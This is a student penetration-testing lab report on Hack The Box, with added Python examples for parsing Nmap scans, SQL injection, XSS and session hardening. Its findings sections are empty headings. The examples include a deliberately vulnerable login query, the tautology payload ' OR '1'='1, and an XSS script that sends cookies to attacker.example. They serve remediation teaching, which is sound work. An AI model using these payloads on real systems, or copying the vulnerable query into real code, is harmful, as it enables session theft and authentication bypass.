202151059_lab5

This lab assignment focuses on conducting penetration testing on a selected website to identify security vulnerabilities and assess the application's security strength. Utilizing tools like Nmap, Burp Suite, and OWASP ZAP, the testing follows phases of reconnaissance, scanning, vulnerability assessment, and post-exploitation. The findings emphasize the importance of implementing remediation measures to enhance security and mitigate risks associated with identified vulnerabilities.

Software and Cybersecurity (CS/IT 445)

Lab Assignment 5: Penetration Testing


Guguloth vamshi
202151059
Objective:
Perform penetration testing on a selected website (public, non-
government, or a specifically designed vulnerable website) and
create a detailed penetration testing report based on your findings.

Introduction:

This lab assignment involves conducting a penetration test on a chosen target
website. The objective is to detect security vulnerabilities and evaluate the
overall security strength of the application. Penetration testing, or ethical
hacking, is a controlled, authorized simulation of a cyberattack, aimed at
identifying weak points in systems or applications before malicious actors
exploit them.

In this assignment, we will utilize industry-recognized tools such as Burp
Suite, OWASP ZAP, and Nmap to follow the phases of a penetration test:
reconnaissance, scanning, vulnerability analysis, exploitation, and
post-exploitation. Testing must only be conducted on platforms you are
authorized to attack, such as OWASP Juice Shop, Hack The Box, or Damn
Vulnerable Web Application (DVWA), which are intentionally built for
security testing.

Tools Used:

1. Nmap

• Purpose: Nmap (Network Mapper) is a versatile tool for network
discovery and security auditing. It helps testers detect live hosts,
open ports, running services and their versions, and, through its NSE
scripts, known vulnerabilities in those services.

2. Whois Tool
• Purpose: Whois is used during the reconnaissance phase. It returns
domain registration details (registrar, registration and expiry dates,
name servers and, where not redacted, registrant contacts) that help
profile the target's ownership and infrastructure.

3. Burp Suite

• Purpose: Burp Suite is a robust platform for identifying and exploiting
vulnerabilities in web applications. It plays a central role in the
vulnerability assessment and exploitation phases.
• Features:
o Proxy: Captures, and lets you inspect and modify, HTTP/HTTPS requests
and responses between the browser and the server.
o Spider (replaced by the Crawler in Burp Suite 2.x): Automatically maps
the website by following links and submitting forms to discover content.
o Scanner (Burp Suite Professional only): Performs automated scans for
common web vulnerabilities such as SQL injection, cross-site scripting
(XSS), and authentication flaws.
o Intruder: Automates customised attacks, such as brute-forcing login
credentials or fuzzing parameters with payload lists.
o Repeater: Lets you modify and resend individual HTTP requests to see
how the application responds to each change.
• Usage: Burp Suite is used in both the vulnerability identification and
exploitation phases to find and confirm security weaknesses in web
applications.

Methodology (tools and techniques used)


This penetration testing exercise was carried out using a systematic
approach based on widely accepted industry practices. The testing
process was divided into several phases, each employing specific
tools and techniques to identify vulnerabilities and assess the
security posture of the target website.
1. Reconnaissance
The reconnaissance phase involved gathering as much information
as possible about the target website without directly interacting with
it (passive) and through limited direct interaction (active).
• Tools Used:
o Whois: Collected domain registration information to
understand the ownership and infrastructure of the target.
o nslookup: Resolved the domain name (and any known subdomains) to IP
addresses and looked up its DNS records; nslookup only resolves names
you query, it does not enumerate subdomains by itself.
2. Scanning
In this phase, the website was scanned to identify open ports,
services, and other network-related vulnerabilities that could be
exploited.
• Tools Used:
o Nmap: Performed network scanning to discover open
ports, identify running services, and reveal possible
vulnerabilities. The tool also provided information on
service versions and operating system details, which
helped in focusing further testing efforts.
3. Vulnerability Assessment
This phase aimed to detect vulnerabilities within the web application,
including issues related to input validation, session management,
and improper configurations.
• Tools Used:
o Burp Suite: Used to inspect and manipulate HTTP/HTTPS
requests and responses. The tool's proxy, scanner, and
intruder features were utilized to assess the web
application for common vulnerabilities.
o OWASP ZAP: Another web vulnerability scanner, used to
automate the discovery of issues such as SQL injection,
XSS, and broken authentication.
o Nikto: Employed to scan the web server for known
vulnerabilities, including misconfigurations and outdated
software.

5. Post-Exploitation
Post-exploitation focused on analyzing potential data access,
privilege escalation, and the persistence of attacks in a controlled
environment. While no real post-exploitation actions were carried
out due to ethical considerations, this phase would typically assess
what an attacker could gain after successful exploitation.
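The scanning and vulnerability-assessment phases above produce raw tool output that has to be turned into the report's findings table. As an added example (not part of the original lab report), the following Python script parses Nmap XML output of the kind `nmap -sV -O -oX scan.xml <target>` writes, lists every open port with its service, version and the OS guess, and flags any open port that is not on an allowlist of services a web target is expected to expose. The XML is constructed sample data, not a real scan; the host address and the allowlist are assumptions.

```python
"""Turn an Nmap XML scan (nmap -sV -O -oX scan.xml <target>) into the
host/port/service table a pentest report needs, and flag open ports that
are not on the expected-services allowlist (input for the 'close
unnecessary ports' remediation). Added example; the scan output below is
constructed, not a real scan."""
import xml.etree.ElementTree as ET

# Constructed sample shaped like real `nmap -sV -O -oX` output (assumed host).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 10.10.10.5">
  <host>
    <status state="up"/>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <hostnames><hostname name="target.lab" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.6p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.29"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed" reason="reset"/>
        <service name="https"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.7.33"/>
      </port>
    </ports>
    <os><osmatch name="Linux 4.15 - 5.6" accuracy="95"/></os>
  </host>
</nmaprun>
"""

# Assumed policy: a web target should expose only HTTP/HTTPS; anything else is a finding.
EXPECTED_SERVICES = {("tcp", 80), ("tcp", 443)}


def parse_nmap_xml(xml_text):
    """Return one dict per *open* port with host, OS guess, service and version."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        os_el = host.find("os/osmatch")
        os_guess = os_el.get("name") if os_el is not None else "unknown"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not attack surface
            svc = port.find("service")
            version = ""
            if svc is not None:
                version = " ".join(filter(None, [svc.get("product"), svc.get("version")]))
            findings.append({
                "host": addr,
                "os": os_guess,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": svc.get("name", "?") if svc is not None else "?",
                "version": version,
            })
    return findings


def unexpected_ports(findings, expected=EXPECTED_SERVICES):
    """Open ports outside the allowlist: candidates to close or firewall."""
    return [f for f in findings if (f["proto"], f["port"]) not in expected]


def report_table(findings):
    """Plain-text table in the form a findings section would present it."""
    lines = [f"{'HOST':<14}{'PORT':<10}{'SERVICE':<10}VERSION"]
    for f in findings:
        lines.append(f"{f['host']:<14}{f['port']}/{f['proto']:<6}{f['service']:<10}{f['version']}")
    return "\n".join(lines)


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(report_table(found))
    for f in unexpected_ports(found):
        print(f"[!] unexpected service {f['service']} on {f['port']}/{f['proto']}: restrict or close")
```

Only `open` ports are kept because closed and filtered ports are not reachable services; the allowlist is what turns a port list into a finding, so adjust it to what the target is actually supposed to serve before reporting.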

Select a Website: Hack The Box

• Choose a public website, preferably a site built for vulnerability
testing.
• Ensure the website is legal to test (avoid testing live websites
without consent).
Website details:
Gathering information about the website under test:
Findings:
1. Scanning the web application:
Proxying and intercepting:
Crawling and mapping:
Remediation Recommendations:
1. Close Unnecessary Ports: Limit the attack surface by disabling
non-essential services and firewalling every port the website does not
need to expose (for a web server, usually only 80 and 443).
2. Implement Input Validation: Prevent SQL injection by using
parameterized queries (prepared statements) instead of building SQL
from user input, and prevent XSS by encoding output for the context it
is rendered in. Validate all input on the server side; client-side
checks improve usability but are trivially bypassed and are not a
security control.
3. Strengthen Session Management: Generate session tokens from a
cryptographically secure random source, issue a new token after login,
serve every page over HTTPS, set the Secure, HttpOnly and SameSite
cookie flags, and enforce idle and absolute session timeouts to limit
the impact of session hijacking.
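To make recommendation 2 concrete, here is an added example (not code from the original report or from any target) showing the same login lookup written the way scanners flag it, with user input concatenated into the SQL string, beside the parameterized version, plus a reflected-XSS sink with and without output encoding. It uses an in-memory SQLite database; the users, passwords and payloads are constructed.

```python
"""Remediation 2 illustrated: string-built SQL (vulnerable) versus a
parameterized query (hardened), and raw versus encoded HTML output.
Added example; database contents and payloads are constructed."""
import html
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    # Plaintext passwords only to keep the injection demo short; a real
    # application stores a salted password hash, never the password.
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "correct-horse"), ("bob", "battery-staple")])
    return db


def login_vulnerable(db, username, password):
    """Deliberately vulnerable: user input becomes part of the SQL text."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(db, username, password):
    """Parameterized query: values travel separately from the statement, so a
    quote in the input can never change the query's structure."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def render_greeting_vulnerable(name):
    """Reflected XSS: untrusted input dropped straight into the HTML body."""
    return f"<p>Welcome, {name}!</p>"


def render_greeting_hardened(name):
    """Contextual output encoding at the sink (HTML body context). This, on the
    server side, is what 'sanitizing' has to mean for XSS."""
    return f"<p>Welcome, {html.escape(name, quote=True)}!</p>"


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"   # classic tautology: makes the WHERE clause always true
    print(login_vulnerable(db, "alice", payload))   # a username: authentication bypassed
    print(login_hardened(db, "alice", payload))     # None: the payload is just a wrong password
    xss = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
    print(render_greeting_vulnerable(xss))
    print(render_greeting_hardened(xss))
```

The vulnerable query becomes `... AND password = '' OR '1'='1'`, which matches every row, so any username logs in without a password; the parameterized form compares the literal string `' OR '1'='1` against the stored password and fails. `html.escape` is correct only for the HTML body and attribute contexts; JavaScript, URL and CSS contexts each need their own encoder.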
By implementing these remediation steps, the website's overall
security will be significantly improved, reducing the risk of
unauthorized access, data breaches, and exploitation of
vulnerabilities.
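Recommendation 3 is easiest to check against code. The following added example (not from the original report) is a minimal server-side session store implementing the controls listed there: tokens from the OS CSPRNG, a fresh token issued at login so a pre-authentication token cannot be fixed on a victim, idle and absolute timeouts, and a Set-Cookie value carrying the Secure, HttpOnly and SameSite flags. The timeout values and cookie name are assumptions, and the clock is injectable so the expiry logic can be exercised without waiting.

```python
"""Remediation 3 illustrated: session tokens, regeneration at login,
idle/absolute timeouts, and hardened cookie attributes.
Added example; timeouts and cookie name are assumed values."""
import secrets
import time

IDLE_TIMEOUT = 15 * 60        # seconds of inactivity before the session dies (assumed)
ABSOLUTE_TIMEOUT = 8 * 3600   # hard lifetime regardless of activity (assumed)


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock          # injectable for testing the timeouts
        self._sessions = {}          # token -> {"user", "created", "last_seen"}

    def create(self, user):
        token = secrets.token_urlsafe(32)   # 256 bits of OS randomness, unguessable
        now = self._clock()
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def login(self, user, old_token=None):
        """Issue a brand-new token at login and discard any pre-auth token:
        this is the session-fixation defence."""
        if old_token:
            self._sessions.pop(old_token, None)
        return self.create(user)

    def validate(self, token):
        """Return the user of a live session, or None (dropping the session)
        when the idle or absolute timeout has passed."""
        s = self._sessions.get(token)
        if s is None:
            return None
        now = self._clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[token]
            return None
        s["last_seen"] = now
        return s["user"]

    def logout(self, token):
        self._sessions.pop(token, None)


def session_cookie(token):
    """Set-Cookie value: sent only over HTTPS (Secure), invisible to script
    (HttpOnly), not sent on cross-site requests (SameSite=Strict), and with
    no Max-Age so the browser does not persist it to disk."""
    return f"session={token}; Path=/; Secure; HttpOnly; SameSite=Strict"


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create("anonymous")        # token handed out before authentication
    token = store.login("alice", old_token=anon)
    print("Set-Cookie:", session_cookie(token))
    print("old token valid:", store.validate(anon))   # None
    print("new token valid:", store.validate(token))  # alice
```

The `validate` method refreshes `last_seen` on every successful check, so the idle timeout measures real inactivity while the absolute timeout still caps a session that is kept alive indefinitely; both are the server-side limits that make a stolen cookie worthless after a bounded window.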

Conclusion :
The objective of this penetration testing exercise was to assess the
security posture of a selected target website through a series of
systematic steps, including reconnaissance, scanning, vulnerability
assessment, and exploitation. By using a structured methodology
and industry-standard tools such as Whois, Nmap, Burp Suite, and
OWASP ZAP, the test successfully identified multiple vulnerabilities.
These vulnerabilities highlight potential risks in areas like port
configuration, input validation, session management, and overall
application security.
The testing process revealed several critical points:
• Reconnaissance provided valuable insights into the target's
infrastructure.
• Nmap scans identified open ports and active services,
expanding the potential attack surface.
• Vulnerability scanning with Burp Suite and OWASP ZAP
exposed issues such as SQL Injection, Cross-Site Scripting
(XSS), and poor input validation.
Although exploitation was confined to controlled environments, these
findings demonstrate the need for stronger security measures to
mitigate risks and safeguard against unauthorized access or data
breaches.
